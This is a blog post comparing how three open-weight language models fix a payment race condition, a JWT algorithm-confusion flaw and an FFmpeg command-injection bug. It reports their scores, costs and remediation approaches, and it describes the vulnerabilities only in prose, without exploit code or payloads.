After testing frontier models on security vulnerabilities, a reader asked: "Why not test open-weight models?" So we ran MiniMax M2, Kimi K2 Thinking, and GLM-4.6 against three vulnerabilities: a payment race condition, JWT algorithm confusion, and an FFmpeg command injection to see how they compare.
A Reader Asked Why Not Test Open-Weight Models
Testing Methodology
We selected three open-weight models from our leaderboard:
MiniMax M2 from MiniMax
Kimi K2 Thinking from Moonshot AI
GLM-4.6 from Z.ai
We ran all tests in Kilo Code on the same base Node.js project (TypeScript + Hono) with all required dependencies pre-installed. For each vulnerability, we created a single file containing only the vulnerable code and prompted the model: "Fix this security vulnerability," without describing the vulnerability type or giving extra context.
Why we did this: Real-world use cases involve vague prompts. This approach was different from what many benchmarking providers do, where they provide (often) detailed prompts to test output.
Testing GLM-4.6 in Kilo Code with the standardized Node.js security test project.
How We Evaluated the Model Outputs
We scored each fix across four dimensions:
Correctness: Did it fully close the vulnerability?
Security depth: Did it add defense-in-depth (password hashing, timing-safe comparisons, environment variables)?
Code quality: Is the code clear, maintainable, and appropriately scoped?
Reliability: Did it avoid introducing new bugs or production risks?
Test Design
Test 1: Payment Race Condition
A Node.js payment service with a TOCTOU (time-of-check-time-of-use) double-spend vulnerability. The handler checks the account balance, calls an async payment provider (200ms delay), then deducts the balance.
Two concurrent requests can both pass the balance check before either deducts, which allows users to overspend. This is similar to the Starbucks gift card race exploit from 2015.
Test 2: JWT Algorithm Confusion
An authentication service that accepts both RS256 (asymmetric) and HS256 (symmetric) while using the same public key value for verification.
RS256 uses a private key to sign and a public key to verify. HS256 uses a shared secret for both. Because the public key is not secret, attackers can reuse it as an HS256 secret to forge admin tokens, similar to CVE-2015-9235.
Test 3: Command Injection in FFmpeg
A thumbnail generation API that interpolates user input directly into a shell command executed with exec().
The exec() call passes a string to the shell, which interprets metacharacters like ; | & $(). Attackers can inject commands through the filter parameter, similar to ImageTragick (CVE-2016-3714) where ImageMagick processed filenames as shell commands.
Test Results
Test 1: Payment Race Condition
All three models correctly identified the race condition and implemented locking mechanisms.
MiniMax M2 ($0.02): Fixed the race condition with a queue-based mutex and added several production features beyond the core fix.
MiniMax M2 added rate limiting (10 requests per minute), transaction logging with an audit trail, regex-based input validation, admin endpoints for monitoring (/transactions, /health), and a 5% error simulation to mimic external payment provider failures.
MiniMax M2 in Kilo Code after fixing the payment race condition.
Kimi K2 Thinking ($0.08): Used a per-user lock around the critical section and limited changes to the race condition fix.
GLM-4.6 ($0.16): Implemented a per-user promise-based lock around balance updates and added userId and amount validation.
Test 2: JWT Algorithm Confusion
All models fixed the core vulnerability by restricting algorithms to RS256 only.
MiniMax M2 ($0.01): Restricted verification to RS256 but left the rest of the auth flow mostly unchanged:
Correctly restricted verification to RS256
Left the
HS_SECRETvariable in the code unusedKept plaintext password storage
Did not change error handling or environment variable usage
Kimi K2 Thinking ($0.04): Restricted verification to RS256 and added additional auth hardening:
Fixed the algorithm confusion with an explicit comment
Added bcrypt password hashing
Implemented timing-safe user enumeration protection
Loaded keys from environment variables with newline handling
Changed auth errors to generic messages to reduce information leakage
Kimi K2 Thinking in Kilo Code after fixing the JWT algorithm confusion.
GLM-4.6 ($0.07): Restricted verification to RS256 and removed HS256 from the allowed algorithms.
Correctly restricted algorithms to RS256 only
Removed HS256 from the allowed algorithms list
Fixed the vulnerability with minimal code changes
Maintained the existing auth flow structure
Test 3: Command Injection in FFmpeg
All models switched from exec() to safe alternatives, but implementation quality varied.
MiniMax M2 ($0.02): Used spawn() with validation but didn't wait for process completion
Used
spawn()with an argument arrayValidated filters with multiple regex patterns
Normalized and validated input paths
Correctly prevented command injection but returned success before FFmpeg completed
Kimi K2 Thinking ($0.04): Used regex-based validation with execFile()
Used
execFile()to avoid shell parsingAllowed multiple base directories for input files
Sanitized output filenames
Returned structured error responses including FFmpeg stderr
GLM-4.6 ($0.05): Used a strict filter allowlist and directory sandboxing
Used
spawn()with argument arrays (no shell interpolation)Implemented strict filter allowlist with predefined safe options only
Restricted input files to a single sandboxed directory
/app/uploadsValidated all file paths before processing
Wrapped the FFmpeg call in a Promise and properly awaited process completion before returning
Cost Analysis: 5.6x Price Difference
MiniMax M2 costs 82% less than GLM-4.6 and 69% less than Kimi K2 Thinking. Its scores ranged from 82 to 95, with its highest score (95) on the race condition test.
Overall Quality Scores
Based on our four evaluation dimensions, here's how each model scored:
MiniMax M2's scores ranged from 82 to 95. Kimi K2 Thinking stayed between 93 and 96.
Performance Patterns Across Tests
MiniMax M2
Profile: Lowest cost with varied approaches
Achieved the highest score (95) on the race condition test
Lowest cost at $0.017 per vulnerability
Detected all three vulnerabilities successfully
Provided minimal fixes focused on the core security issue
Kimi K2 Thinking
Profile: Consistent fixes with security improvements beyond the core vulnerability
All three fixes were deployment-ready in our tests
Added security hardening beyond the core fix in every test
Maintained scores in the 93--96 range
Average cost of $0.053 per vulnerability
GLM-4.6
Profile: Correct fixes with conservative security choices
Fixed every vulnerability without introducing new ones in our tests
Preferred restrictive controls such as strict allowlists and directory sandboxing
Had the highest average cost at $0.093 per vulnerability
Scores stayed in the 90--94 range
How Models Performed by Vulnerability Type
The models showed different strengths depending on the vulnerability.
Race Condition (Test 1)
All three models added locking around balance updates and closed the double-spend vulnerability.
MiniMax M2 combined a queue-based mutex with rate limiting, transaction logging, and monitoring endpoints, which scored 95 on this test.
GLM-4.6 and Kimi K2 Thinking focused on per-user locks without additional observability or rate limiting and scored 90 and 93 respectively.
JWT Algorithm Confusion (Test 2)
All three models restricted verification to RS256 and removed HS256 from the allowed algorithms.
Kimi K2 Thinking was the only model that added bcrypt password hashing, timing-safe user checks, environment variable handling, and generic error messages; it scored 96 on this test.
GLM-4.6 limited its changes to the algorithm list and left the rest of the auth flow unchanged (90), while MiniMax M2 restricted algorithms but kept plaintext passwords and unused variables (85).
Command Injection (Test 3)
All three models replaced
exec()with safer process execution methods (spawnorexecFile) and validated inputs before calling FFmpeg.GLM-4.6 and Kimi K2 Thinking both produced production-ready implementations in our tests, each scoring 94, with GLM favoring a strict filter allowlist and directory sandboxing and Kimi using regex-based validation and multiple allowed directories.
MiniMax M2 used
spawn()with filter and path validation but didn't await the process completion, scoring 82. While this would need adjustment for production use, it correctly prevented the command injection.
Across the three tests, MiniMax M2 produced the most extensive changes on the race condition, Kimi K2 Thinking added the deepest auth hardening, and GLM-4.6 favored restrictive defaults for command execution.
Which Models Should You Use?
For high-volume security scanning: MiniMax M2 at $0.017 per vulnerability makes high-volume security scanning very affordable at scale. When you need to check hundreds of files or run continuous security checks, the 82% cost reduction means you can actually afford broad coverage. It caught all three vulnerabilities in our tests.
For balanced everyday use: Kimi K2 Thinking provides consistent quality (93-96 scores) at mid-range cost ($0.053 per vulnerability). It produced deployment-ready fixes in all three scenarios with additional security hardening built in.
For a complementary opinion: Add GLM-4.6 to either model above when you need a second opinion. Its strict allowlists and sandboxing approach provide a different approach to security. Running MiniMax M2 + GLM-4.6 together cost $0.11 per vulnerability, while Kimi K2 + GLM-4.6 cost $0.146 per vulnerability.
What This Means for Open-Weight LLMs
Across these three vulnerabilities, all three open-weight models identified and fixed every core issue (3 of 3 tests each). In practical terms, they found problems that typical human code review might miss, including the race condition and the JWT algorithm confusion.
The biggest differences we observed relative to frontier models were consistency and depth of hardening. While frontier models like GPT-5 and Claude Opus 4.1 typically add more comprehensive hardening, the open-weight models all successfully identified the core vulnerabilities.
From a cost perspective, running all three open-weight models against all three vulnerabilities ($0.05 + $0.16 + $0.28 = $0.49 total) is still below the price of many individual frontier model calls. For teams willing to review and combine outputs, open-weight LLMs can cover real security work at relatively low cost.














Top comments (0)